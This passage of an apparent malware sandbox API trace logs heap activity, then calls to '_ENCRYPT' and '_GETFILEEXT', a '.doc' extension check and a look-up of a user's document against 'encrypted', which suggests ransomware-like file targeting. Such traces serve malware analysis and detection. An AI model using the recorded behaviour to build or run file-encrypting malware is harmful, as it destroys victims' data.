lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0035.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0035.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0035.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.844] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0035.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.845] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0035.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0035.846] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.847] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.847] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c790 [0035.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c790, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0035.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.848] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0035.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.848] CloseHandle (hObject=0x140) returned 1 [0035.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.848] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.849] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.849] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.849] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.849] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.849] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.849] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.849] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.849] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.849] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.849] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x697d97e0, ftCreationTime.dwHighDateTime=0x1d5b721, ftLastAccessTime.dwLowDateTime=0xa3192220, ftLastAccessTime.dwHighDateTime=0x1d5bf06, ftLastWriteTime.dwLowDateTime=0xa3192220, ftLastWriteTime.dwHighDateTime=0x1d5bf06, nFileSizeHigh=0x0, nFileSizeLow=0x5068, dwReserved0=0x0, dwReserved1=0x777648, cFileName="oY6qw7y-W3iuu.doc", cAlternateFileName="OY6QW7~1.DOC")) returned 0x7c20c0 [0035.850] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.850] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.850] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x697d97e0, ftCreationTime.dwHighDateTime=0x1d5b721, ftLastAccessTime.dwLowDateTime=0xa3192220, ftLastAccessTime.dwHighDateTime=0x1d5bf06, ftLastWriteTime.dwLowDateTime=0xa3192220, ftLastWriteTime.dwHighDateTime=0x1d5bf06, nFileSizeHigh=0x0, nFileSizeLow=0x5068, dwReserved0=0x0, dwReserved1=0x777648, cFileName="oY6qw7y-W3iuu.doc", cAlternateFileName="OY6QW7~1.DOC")) returned 0x7c20c0 [0035.850] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.850] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", 